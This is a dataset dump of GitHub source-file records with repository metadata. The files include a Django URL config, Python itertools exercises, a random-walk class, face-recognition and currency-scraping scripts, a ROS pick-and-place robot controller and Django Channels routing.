blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b64a892771db4f09e82dc8848ce1e8a456c0b1ac | 7930864c38fd8aeaf3c9dd0bb396aaeb1ee0a0f2 | /mysite/mysite/urls.py | cfb6617a3019c34a3703d92c17c80a7cd8acdcea | [] | no_license | ksmith-1989/blog | 8caa46cff8f9dae4c4e6b3839c981520b0e9bbd0 | d46d786bd1320b7bf840f0bc40ddd6408eb358d2 | refs/heads/master | 2022-09-01T00:13:25.390912 | 2020-05-20T06:38:31 | 2020-05-20T06:38:31 | 265,130,040 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('blog/', include('blog.urls')),
path('admin/', admin.site.urls),
]
| [
"kj10068@gmail.com"
] | kj10068@gmail.com |
7b10e1771bc7133cd12e42ff4ced75617ba3270c | 826cdefb3554e6bbc7b5e5fa9bc6f55268cd58dd | /src/main/python/basics/itertools.py | 4c731ae4d27d12208d8fbb8b22bcd656bceb3a3f | [] | no_license | lj015625/CodeSnippet | 67d1f556497948b3db51c67af07f16a21751427e | 73e9375c5d7edcc50170569c0bd99fd415557d85 | refs/heads/master | 2023-09-01T14:59:57.162553 | 2023-08-24T11:07:37 | 2023-08-24T11:07:37 | 61,499,418 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import itertools as it
def combinational_dice_rolls(n, m):
    """Return every ordered outcome of rolling n dice with faces 1..m.

    Each outcome is a tuple of length n; there are m**n of them, in
    lexicographic order.
    """
    return list(it.product(range(1, m+1), repeat=n))

# Demo call; the returned list of outcomes is discarded.
combinational_dice_rolls(2, 2)

def cartesian_product(arr1, arr2):
    """Print the Cartesian product of the two input iterables on one line.

    Bug fix: the original body read the module-level globals A and B instead
    of the arr1/arr2 parameters, so the arguments were silently ignored.
    """
    print(*it.product(arr1, arr2))

A = [1, 2, 3]
B = [1, 2, 3]
cartesian_product(A, B)
# Demo: all permutations of the sorted character list, taken n at a time.
# NOTE(review): here s == ['2'] (one element) while n == 3; permutations with
# r greater than the iterable length yields nothing, so this loop prints no output.
s, n = 2, 3
s = sorted(str(s))
n = int(n)
for i in it.permutations(s,n):
    # sep='\n' has no effect when print receives a single positional argument.
    print(''.join(i), sep='\n')
# Demo: combinations of the sorted string for every size from 1 to n.
s, n = 'ABC', 2
for i in range(1, int(n)+1):
    for j in it.combinations(sorted(s), i):
        print(''.join(j))
# This tool returns length subsequences of elements from the input iterable allowing individual elements to be repeated more than once.
s, n = 'ABC', 2
for c in it.combinations_with_replacement(sorted(s), int(n)):
    print("".join(c))
# create list of tuples from repeating items in a string
# groupby collapses each run of equal characters into one (run_length, digit) pair.
print(*[(len(list(values)), int(key)) for key, values in it.groupby('12345')])
# count number of a in combinations
# Fraction of the size-k combinations of arr that contain at least one 'a'.
n = 4
arr = ['a', 'a', 'c', 'd']
k = 2
count = 0
total = 0
for t in it.combinations(arr, k):
    total += 1
    count += 'a' in t  # the boolean membership test counts as 0 or 1
print(count/total)
| [
"leonardo.ji@cerner.com"
] | leonardo.ji@cerner.com |
689d10639b1ba6a0ebc83a093cb7bb8d7adaf79a | d2b533cf97fc7c09534bec634e9984b41b2188cc | /chapter_15/random_walk.py | 138bdc47d740f2423b5aa7d816d9615fb99a6083 | [] | no_license | EdwardHc/python | 65f5dbb99a547b5de9d918deb8e019ada124ad22 | 31af9adf3c2e300164072a428b5a273b94f8bf46 | refs/heads/master | 2020-04-10T23:10:10.506947 | 2018-12-20T14:54:09 | 2018-12-20T14:54:09 | 161,343,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | from random import choice
class RandomWalk():
    """Generate the point sequence of a two-dimensional random walk."""

    def __init__(self, num_points=5000):
        """Start a walk of *num_points* points at the origin (0, 0)."""
        self.num_points = num_points
        # Both coordinate histories begin at the origin.
        self.x_values = [0]
        self.y_values = [0]

    def get_step(self):
        """Return one axis step: a random direction times a random distance."""
        direction = choice([1, -1])
        distance = choice([0, 1, 2, 3, 4, 5, 6, 7, 8])
        return direction * distance

    def fill_walk(self):
        """Append points until the walk holds num_points entries."""
        xs = self.x_values
        ys = self.y_values
        while len(xs) < self.num_points:
            # Draw an x-step, then a y-step, for the next candidate move.
            dx = self.get_step()
            dy = self.get_step()
            # A (0, 0) move would leave the walker in place; skip it.
            if dx == 0 and dy == 0:
                continue
            # Next point is the previous point offset by the step.
            xs.append(xs[-1] + dx)
            ys.append(ys[-1] + dy)
| [
"aahuichao0811@126.com"
] | aahuichao0811@126.com |
ece4d0ba4c813bec3de36f51ced17e2d06a8f913 | 868d4287d986abe26f2ef8e0ee4c0a8bb29c136f | /imagedetection.py | 12e6029b9964ac8557620c04e1f3ceab077c1166 | [] | no_license | 87jaydeepsingh/python-test-files- | edf9c46af4ed84137a7d594a958f093b33ced2a0 | e836a940301b1b77c29c25d7d84cb1473147a72c | refs/heads/master | 2023-06-18T09:08:57.237784 | 2021-07-20T18:42:15 | 2021-07-20T18:42:15 | 387,876,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | import face_recognition
# Load the reference photo and the photo to be identified.
reference_img = face_recognition.load_image_file("test.jpg")
candidate_img = face_recognition.load_image_file("download.jpg")
# Take the first detected face in each image
# (NOTE(review): raises IndexError if no face is found — TODO confirm inputs).
reference_encoding = face_recognition.face_encodings(reference_img)[0]
candidate_encoding = face_recognition.face_encodings(candidate_img)[0]
# compare_faces returns one boolean per reference encoding.
results = face_recognition.compare_faces([reference_encoding], candidate_encoding)
print(results)
| [
"87jaydeepsingh@github.com"
] | 87jaydeepsingh@github.com |
bc64be2d69532cff8650b5bcfc4817578ae55e87 | efaeb34b3c86ef9d79be6f4b9e17f34080d117e9 | /tests/test_network.py | c941b44771d583b3e1a4d10c00cbc9628661065b | [] | no_license | Mazyod/ethogram | f64346180536e75c404c94ef5c04ab833b00b454 | c5498f2de31e6c6cb4c06569d7884b10a89bbabe | refs/heads/master | 2021-04-27T02:26:32.396570 | 2019-03-08T14:32:38 | 2019-03-08T14:32:38 | 122,696,093 | 6 | 2 | null | 2018-06-01T20:48:28 | 2018-02-24T02:44:27 | Python | UTF-8 | Python | false | false | 291 | py | import unittest
from ethogram.network import Network
class NetworkTests(unittest.TestCase):
    """Integration checks for the Network client."""

    def test_fetch_all_rigs(self):
        """Fetching rigs for the 'mazyod' account yields one rig named 'mastery'."""
        client = Network()
        fetched = client.fetch_rigs("mazyod")
        self.assertEqual(len(fetched), 1)
        self.assertEqual(fetched[0].name, "mastery")
| [
"mazjaleel@gmail.com"
] | mazjaleel@gmail.com |
684e78d298475edf5350934fbb380bb497a3bb7e | 0cc9ba497efeae7de808b3063f932cee9449bc20 | /akshare/fx/currency_investing.py | 41abf6485117ce7ccd18ebed6240baa7a5dd72a6 | [
"MIT"
] | permissive | louis100/akshare | 08dc7d71c194e973092174dabc307e28a2aaf7d6 | 0b2ad15982dc1e4081929ed634e96c559bf3ef7e | refs/heads/master | 2022-12-12T16:26:38.294899 | 2020-09-16T04:25:46 | 2020-09-16T04:25:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,907 | py | # -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Date: 2020/9/9 11:56
Desc: 英为财情-外汇-货币对历史数据
https://cn.investing.com/currencies/
https://cn.investing.com/currencies/eur-usd-historical-data
"""
import re
import pandas as pd
import requests
from bs4 import BeautifulSoup
from akshare.index.cons import short_headers, long_headers
def _currency_name_url() -> dict:
    """
    Map Chinese currency-pair names to their investing.com URL slugs.

    :return: mapping of Chinese pair name -> lowercase slug (e.g. "eur-usd")
    :rtype: dict
    """
    url = "https://cn.investing.com/currencies/"
    res = requests.post(url, headers=short_headers)
    # The first table on the page is the live currency quote board.
    data_table = pd.read_html(res.text)[0].iloc[:, 1:]
    data_table.columns = ['中文名称', '英文名称', '最新', '最高', '最低', '涨跌额', '涨跌幅', '时间']
    slugs = (name.lower().replace("/", "-") for name in data_table["英文名称"].tolist())
    return dict(zip(data_table["中文名称"].tolist(), slugs))
def currency_hist(symbol: str = "usd-vnd", start_date: str = "20050101", end_date: str = "20200717") -> pd.DataFrame:
    """
    Historical data for a currency pair from investing.com.

    Mind the length of the requested date range; whether an arbitrary pair
    is available can be checked through currency_name_code.

    :param symbol: currency pair slug, e.g. "usd-vnd"
    :type symbol: str
    :param start_date: start date, formatted YYYYMMDD
    :type start_date: str
    :param end_date: end date, formatted YYYYMMDD
    :type end_date: str
    :return: historical data of the currency pair
    :rtype: pandas.DataFrame
    """
    # Convert YYYYMMDD to the YYYY/MM/DD form the site expects.
    start_date = "/".join([start_date[:4], start_date[4:6], start_date[6:]])
    end_date = "/".join([end_date[:4], end_date[4:6], end_date[6:]])
    temp_url = f"https://cn.investing.com/currencies/{symbol.lower().replace('/', '-')}-historical-data"
    # Bug fix: the page used to be requested and parsed twice in a row; a
    # single request yields both the page title and the histDataExcessInfo ids.
    res = requests.post(temp_url, headers=short_headers)
    soup = BeautifulSoup(res.text, "lxml")
    title = soup.find("h2", attrs={"class": "float_lang_base_1"}).get_text()
    data = soup.find_all(text=re.compile("window.histDataExcessInfo"))[0].strip()
    para_data = re.findall(r"\d+", data)  # [curr_id, smlID]
    payload = {
        "curr_id": para_data[0],
        "smlID": para_data[1],
        "header": title,
        "st_date": start_date,
        "end_date": end_date,
        "interval_sec": "Daily",
        "sort_col": "date",
        "sort_ord": "DESC",
        "action": "historical_data",
    }
    url = "https://cn.investing.com/instruments/HistoricalDataAjax"
    res = requests.post(url, data=payload, headers=long_headers)
    soup = BeautifulSoup(res.text, "lxml")
    vest_list = [item.get_text().strip().split("\n") for item in soup.find_all("tr")]
    raw_df = pd.DataFrame(vest_list)
    # The first row holds the column headers and the last row is a footer.
    df_data = pd.DataFrame(vest_list, columns=raw_df.iloc[0, :].tolist()).iloc[1:-1, :]
    df_data.index = pd.to_datetime(df_data["日期"], format="%Y年%m月%d日")
    # Convert the percent-change column, e.g. "1.23%" -> 0.0123.
    df_data["涨跌幅"] = pd.DataFrame(round(df_data['涨跌幅'].str.replace('%', '').astype(float) / 100, 6))
    del df_data["日期"]
    # Strip thousands separators before the numeric conversion.
    df_data.iloc[:, :-1] = df_data.iloc[:, :-1].applymap(lambda x: x.replace(',', ''))
    df_data = df_data.astype(float)
    return df_data
def _currency_single() -> pd.DataFrame:
    """
    List the single currencies offered on investing.com.

    :return: table with columns short_name, name and code
    :rtype: pandas.DataFrame
    """
    url = "https://cn.investing.com/currencies/single-currency-crosses"
    res = requests.post(url, headers=short_headers)
    soup = BeautifulSoup(res.text, "lxml")
    options = soup.find("select", attrs={"class": "newInput selectBox"}).find_all("option")
    # Each option text looks like "XXX - Long name"; split on the first dash only.
    rows = [opt.get_text().split('-', 1) for opt in options]
    table = pd.DataFrame(rows, columns=["short_name", "name"])
    table["short_name"] = table["short_name"].str.strip()
    table["name"] = table["name"].str.strip()
    # The option value attribute carries the site's internal currency id.
    table["code"] = [opt["value"] for opt in options]
    return table
def currency_name_code(symbol: str = "usd/jpy") -> pd.DataFrame:
    """
    All pairs convertible against either currency of the given pair.

    :param symbol: currency pair, e.g. "usd/jpy"
    :type symbol: str
    :return: table with columns ["name", "code"], e.g. 欧元/美元 -> eur-usd
    :rtype: pandas.DataFrame
    """
    symbol = symbol.upper()
    currency_df = _currency_single()
    url = "https://cn.investing.com/currencies/Service/ChangeCurrency"
    # The two requests below only differ in the "currencies" id, so the
    # previously duplicated request/parse logic is factored into one helper.
    headers = {"Accept": "application/json, text/javascript, */*; q=0.01",
               "Accept-Encoding": "gzip, deflate, br",
               "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
               "Cache-Control": "no-cache",
               "Connection": "keep-alive",
               "Host": "cn.investing.com",
               "Pragma": "no-cache",
               "Referer": "https://cn.investing.com/currencies/single-currency-crosses",
               "Sec-Fetch-Mode": "cors",
               "Sec-Fetch-Site": "same-origin",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
               "X-Requested-With": "XMLHttpRequest",
               }

    def _fetch_name_code_map(short_name):
        """Return the {Chinese pair name: url slug} mapping for one currency."""
        params = {
            "session_uniq_id": "53bee677662a2336ec07b40738753fc1",
            "currencies": currency_df[currency_df["short_name"] == short_name]["code"].values[0],
        }
        res = requests.get(url, params=params, headers=headers)
        temp_df = pd.read_html(res.json()["HTML"])[0].iloc[:, 1:]
        temp_df.rename(columns={"名称.1": "简称"}, inplace=True)
        temp_df["pids"] = [item[:-1] for item in res.json()["pids"]]
        return dict(zip(temp_df["名称"].tolist(),
                        [item.lower().replace("/", "-") for item in temp_df["简称"].tolist()]))

    parts = symbol.split("/")
    name_code_dict = _fetch_name_code_map(parts[0])
    # Pairs of the quote currency extend (and on collision override) those
    # of the base currency, matching the original update() order.
    name_code_dict.update(_fetch_name_code_map(parts[1]))
    temp_df = pd.DataFrame.from_dict(name_code_dict, orient="index").reset_index()
    temp_df.columns = ["name", "code"]
    return temp_df
if __name__ == '__main__':
    # Demo: list the pairs convertible against USD/JPY ...
    currency_name_code_df = currency_name_code(symbol="usd/jpy")
    print(currency_name_code_df)
    # ... then fetch USD/MMK daily history for the given range (network calls).
    currency_hist_df = currency_hist(symbol="usd-mmk", start_date="20131018", end_date="20200915")
    print(currency_hist_df)
| [
"jindaxiang@163.com"
] | jindaxiang@163.com |
bdf1986e8d10fb5da6a93a381a574ceed36d5151 | 2bc833baedc7244c88162e0d254dc46ab9c38fd0 | /src/hello_ros/src/picknplace_object.py | 298d7579570a04833069cb48bc8f176fad2dd64b | [] | no_license | mmmmimic/Pick-and-Place | 5a6b289cac1d14d1f2b3e83140a4494771248a48 | c27a28223b2c54c9679d2fc5874534aeeaa657c5 | refs/heads/master | 2022-09-16T21:47:41.064299 | 2020-06-03T21:16:03 | 2020-06-03T21:16:03 | 214,512,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,423 | py | #!/usr/bin/env python
'''
mini project1
pick and place
Created by Group 5
07/10/2019
'''
import roslib
roslib.load_manifest('hello_ros')
import rospy
import numpy as np
from std_msgs.msg import String
from gazebo_msgs.msg import ModelStates
import sys
import moveit_commander
import geometry_msgs.msg
import moveit_msgs.msg
import copy
from sensor_msgs.msg import JointState
import tf_conversions
import math
import tf, random
import sys
#pos = []
class Planner(object):
'''Pick and Place Robot'''
def __init__(self, *args, **kwargs):
'''Initialization'''
print "Initializing the program"
moveit_commander.roscpp_initialize(sys.argv) #initialize the moveit commander(a class), allowing us to communicate with the move_group
rospy.init_node('move_arm',anonymous=True) # initialize the node, note that there is only allowed to be one node in a program
self.robot = moveit_commander.RobotCommander()
self.scene = moveit_commander.PlanningSceneInterface()
p = moveit_commander.PlanningScene()
p.is_diff=True # initialize the scene
group = moveit_commander.MoveGroupCommander('Arm') # move the arm
group.set_planner_id("RRTkConfigDefault") # the default planner is RTT
## setup the planner
self.update()
group.set_goal_orientation_tolerance(0.01)
group.set_goal_tolerance(0.01)
group.set_goal_joint_tolerance(0.05)
group.set_goal_position_tolerance(0.01)
group.set_num_planning_attempts(100) # try 100 times
self.group = group
## trajectories for RVIZ to visualize.
self.display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',moveit_msgs.msg.DisplayTrajectory,queue_size=1000)
self.scene_pub = rospy.Publisher('/move_group/monitored_planning_scene', moveit_msgs.msg.PlanningScene,queue_size=1000)
self.time = 1 # regular rest time
self.currentJointState = JointState()
#print some basic infomation
print "============ Reference frame: %s ============" % group.get_planning_frame() # the reference frame for this robot
print "============ End effector frame: %s ============" % group.get_end_effector_link() # the end-effector link for this group
print "============ Robot Groups:"
print self.robot.get_group_names() # groups in the robot
print "============ robot state"
print self.robot.get_current_state() # state of the robot
print "============"
def createScene(self):
'''Create the scene and import the objects into the rviz'''
position = self.position
po_size = len(position) # the number of elements of the objects in the "world"
cube_num = po_size-3 # the number of cubes is equal to the sum minus 'robot' and 'desk'
for i in range(cube_num+1): # put the objects
p = geometry_msgs.msg.PoseStamped() # data type: stamped
p.header.frame_id = robot.get_planning_frame()
cube = position[i+2]
p.pose.orientation.w = cube.orientation.w
p.pose.orientation.x = cube.orientation.x
p.pose.orientation.y = cube.orientation.y
p.pose.orientation.z = cube.orientation.z
p.pose.position.x = cube.position.x
p.pose.position.y = cube.position.y
p.pose.position.z = cube.position.z
if i < cube_num:
scene.add_box('cube'+str(i), p,(0.05,0.05,0.05))
print "cube"+str(i)+" added!"
else:
#scene.add_mesh('bucket', p,'./catkin_ws/src/hello_ros/urdf/bucket.dae') # try to import bucket into the scene but failed //2019.10.8
print "bucket added!"
self.scene_pub.publish(moveit_msgs.msg.PlanningScene) # publish the scene
def openGripper(self):
''' open the gripper to fetch objects'''
#rospy.init_node('test_publish')
# Setup subscriber
#rospy.Subscriber("/joint_states", JointState, jointStatesCallback)
currentJointState = self.currentJointState
pub = rospy.Publisher("/jaco/joint_control", JointState, queue_size=1)
currentJointState = rospy.wait_for_message("/joint_states",JointState) # get current joint variables, 9 joints here
#print 'Received!'
currentJointState.header.stamp = rospy.get_rostime()
tmp = 0.005 # set the finger joint variables smaller
#print currentJointState.position
#tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))
currentJointState.position = tuple(list(currentJointState.position[:6]) + [tmp] + [tmp]+ [tmp])
for i in range(3):
pub.publish(currentJointState)
#print 'Published!'
rospy.sleep(self.time)
def closeGripper(self):
''' close the gripper after dropping the objects'''
#rospy.init_node('test_publish')
# Setup subscriber
#rospy.Subscriber("/joint_states", JointState, jointStatesCallback)
currentJointState = self.currentJointState
pub = rospy.Publisher("/jaco/joint_control", JointState, queue_size=1)
currentJointState = rospy.wait_for_message("/joint_states",JointState) # get current joint variables, 9 joints here
#print 'Received!'
currentJointState.header.stamp = rospy.get_rostime()
tmp = 0.7 # set the finger joint variables larger
#tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))
#print currentJointState.position
currentJointState.position = tuple(list(currentJointState.position[:6]) + [tmp] + [tmp]+ [tmp])
for i in range(3):
pub.publish(currentJointState)
#print 'Published!'
rospy.sleep(self.time)
def rvizTraj(self, plan):
'''show the plan in rviz'''
print "============Show in rviz============"
display_trajectory = moveit_msgs.msg.DisplayTrajectory()
display_trajectory.trajectory_start = self.robot.get_current_state()
display_trajectory.trajectory.append(plan)
self.display_trajectory_publisher.publish(display_trajectory);
def showPlan(self, plan):
'''show the plan'''
print "============ Show the plan ============"
print plan
print "============"
def moveJoint(self, joint_value, show_plan=False, show_rviz=False):
'''set joint variable values, then move the arm'''
group = self.group
# joint_value = self.robot.get_current_state().joint_state.position
group.set_joint_value_target(joint_value)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time) # rest 5 seconds
def jointCorrection(self, deviation, show_plan=False, show_rviz=False):
'''set the joint variable deviation, then move the arm'''
group = self.group
joint_value = self.robot.get_current_state().joint_state.position
#print joint_value
#print deviation
joint_value = list(joint_value)
for i in range(6):
joint_value[i] = joint_value[i]+deviation[i]
#joint_value = tuple(joint_value)
#print joint_value[:6]
group.set_joint_value_target(joint_value[:6])
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time) # rest 5 seconds
def moveObj(self, series, show_plan = False, show_rviz=False, height = 1):
'''move the end effector to on the top of an object'''
group = self.group
pose_goal = group.get_current_pose().pose
position = self.position
objects = position[series] # position[robot,desk,cube0,cube1,...,bucket]
pose_goal.position.x =objects.position.x
pose_goal.position.y =objects.position.y
#pose_goal.position.z =cube.position.z
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0., -math.pi/2, 0.)) # make the gripper normal to the desk
pose_goal.position.z =height # 0.95 is the best value we can have, but we can change the height
#print series
#print pose_goal
group.set_pose_target(pose_goal)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
group.go(wait=True)
#group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time)
def movePose(self, pose, show_plan = False, show_rviz=False, is_rot = False):
'''move the end effector to a given position, pose:[x,y,z,r,p,y]'''
group = self.group
pose_goal = group.get_current_pose().pose
position = self.position
if is_rot:
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0., -math.pi/2, 0.)) # make the gripper normal to the desk
else:
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(pose[3], pose[4], pose[5])) # make the gripper normal to the desk
pose_goal.position.x = pose[0]
pose_goal.position.y = pose[1]
pose_goal.position.z = pose[2]
#print pose_goal
group.set_pose_target(pose_goal)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
rospy.sleep(self.time)
def poseCorrection(self, pos, ang=[0.,-math.pi/2,0.], show_plan = False, show_rviz=False):
'''set the position deviation, then move the arm, pos:[x,y,z] ang:[r,p,y]'''
group = self.group
pose_goal = group.get_current_pose().pose
position = self.position
pose_goal.position.x = pose_goal.position.x+pos[0]
pose_goal.position.y = pose_goal.position.y+pos[1]
pose_goal.position.z = pose_goal.position.z+pos[2]
pose_goal.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(ang[0], ang[1], ang[2]))
print pose_goal
group.set_pose_target(pose_goal)
plan = group.plan()
if show_plan:
self.showPlan()
if show_rviz:
self.rvizTraj(plan)
#group.go(wait=True)
group.execute(plan,wait=True)
group.stop()
#rospy.sleep(self.time)
def update(self):
'''update the place of the cubes'''
print "-> update position"
State = rospy.wait_for_message("/gazebo/model_states", ModelStates) # get cube positions
self.position = State.pose
def pickAndPlace(self,series):
'''pick a cube and drop it into the bucket'''
print "move to the object"
print "----------cube"+str(series+1)+"/"+str(len(self.position)-3)+"----------"
print "-> above the cube"
self.moveObj(2+series) # moveObj(2) is to move the first cube
#print "-> open the gripper"
#self.openGripper()
print "-> go down"
self.moveObj(2+series,height=0.94)
print "-> close the gripper"
self.closeGripper()
print "-> rise up"
self.moveObj(2+series, height=1.25)
print "-> move to the bucket"
self.moveObj(-1,height = 1.45)
print "-> open the gripper"
self.openGripper()
print ' '
def run(self):
try:
cube_num = len(self.position)-3 # the number of the cubes
#print "initializing... -> open the gripper"
#self.openGripper()
for i in range(cube_num):
self.pickAndPlace(i)
self.update() # update the cube place to avoid accidental collisions
R = rospy.Rate(50)
while not rospy.is_shutdown():
rospy.spin()
R.sleep
except rospy.ROSInterruptException:
pass
if __name__=="__main__":
#global pos
'''def call_back(msg):
#print 'Received'
global pos
pos = msg.pose # record the position of the robots,cubes and bucket
print pos
#rospy.Subscriber('gazebo/model_states', ModelStates, call_back, queue_size=1000)
#print pos
#sys.exit(1)
'''
p = Planner()
p.run()
| [
"matthewlin98@hotmail.com"
] | matthewlin98@hotmail.com |
6b2e29155e7989d4f19247ee43a3ae011cd71080 | a3c662a5eda4e269a8c81c99e229879b946a76f6 | /.venv/lib/python3.7/site-packages/pylint/test/functional/line_endings.py | 0b6e795e3f2c9b2e9ec6f93c33469324e1ea67ba | [
"MIT"
] | permissive | ahmadreza-smdi/ms-shop | 0c29da82c58b243507575672bbc94fb6e8068aeb | 65ba3f3061e2ac5c63115b08dadfe7d67f645fb6 | refs/heads/master | 2023-04-27T19:51:34.858182 | 2019-11-24T20:57:59 | 2019-11-24T20:57:59 | 223,616,552 | 6 | 2 | MIT | 2023-04-21T20:51:21 | 2019-11-23T16:09:03 | Python | UTF-8 | Python | false | false | 107 | py | "mixing line endings are not welcome"
# +1: [unexpected-line-ending-format, mixed-line-endings]
CONST = 1
# NOTE(review): this is a pylint functional-test fixture; the "# +1:" marker
# above appears to declare the messages expected on the line that follows it,
# so do not insert lines between the marker and CONST or alter line endings.
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
8c66385405873707fcd3fa458d8f11637899adb4 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/323/usersdata/278/89121/submittedfiles/mdc.py | 3185a3f53219a38653c6a227ae7e28e217f85f66 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | # -*- coding: utf-8 -*-
import math

def mdc(a, b):
    """Return the greatest common divisor (máximo divisor comum) of two ints.

    Bug fix: the original script multiplied together common divisors (and in
    one branch used an inverted remainder test, then divided by 2), which does
    not compute the GCD; math.gcd implements it correctly.
    """
    return math.gcd(a, b)

if __name__ == "__main__":
    # Prompts preserved from the original script (Portuguese).
    n1 = int(input("Digite o primeiro número inteiro: "))
    n2 = int(input("Digite o segundo número inteiro: "))
    print(mdc(n1, n2))
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
cf6cdee9548d5e2bf2bc60c5ac516c2831f29116 | 6517bd4dac45eb82e309b9fde8b6bc6a60741d72 | /dj_env/lib/python3.7/site-packages/django_plotly_dash/routing.py | 10cd9c65179c3b558eb0cd5c239a6a33c9b4eb72 | [] | no_license | labanyamukhopadhyay/mara-app | 17488ee6157a3690796685087a8cb0c3aeba9278 | 5b95a99b6cf603cd19a236d324ed3d1212c5ebbe | refs/heads/main | 2023-04-11T16:16:52.707651 | 2021-04-24T01:06:07 | 2021-04-24T01:06:07 | 341,999,086 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,985 | py | '''
Routing for standard pipe connections
Copyright (c) 2018 Gibbs Consulting and others - see CONTRIBUTIONS.md
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.auth import AuthMiddlewareStack
from channels.http import AsgiHandler
from django.conf.urls import url
from django.urls import re_path
from .consumers import MessageConsumer, PokePipeConsumer
from .util import pipe_ws_endpoint_name, http_endpoint, http_poke_endpoint_enabled
# TODO document this and discuss embedding with other routes
# Plain HTTP routes, extended conditionally below before being frozen into
# the ProtocolTypeRouter.
http_routes = [
]
# Expose the HTTP "poke" endpoint only when http_poke_endpoint_enabled()
# reports it enabled.
if http_poke_endpoint_enabled():
    http_routes.append(re_path(http_endpoint("poke"), PokePipeConsumer))
http_routes.append(re_path("^", AsgiHandler)) # AsgiHandler is 'the normal Django view handlers'
# Root ASGI application: websocket traffic at the pipe endpoint goes to
# MessageConsumer; all HTTP traffic goes through http_routes (falling back to
# the normal Django handlers). Both protocols are wrapped in auth middleware.
application = ProtocolTypeRouter({
    'websocket': AuthMiddlewareStack(URLRouter([re_path(pipe_ws_endpoint_name(), MessageConsumer),])),
    'http': AuthMiddlewareStack(URLRouter(http_routes)),
})
| [
"labanyam@hotmail.com"
] | labanyam@hotmail.com |
b2b57465fe49db3db5b58fef26c370a7f74985ee | ba88cd6db28f160fec810d69e27fdd42c84b753a | /prep_model.py | f87cdab4ae43ca39ff5f905f99fd5e81bf0681b1 | [
"MIT"
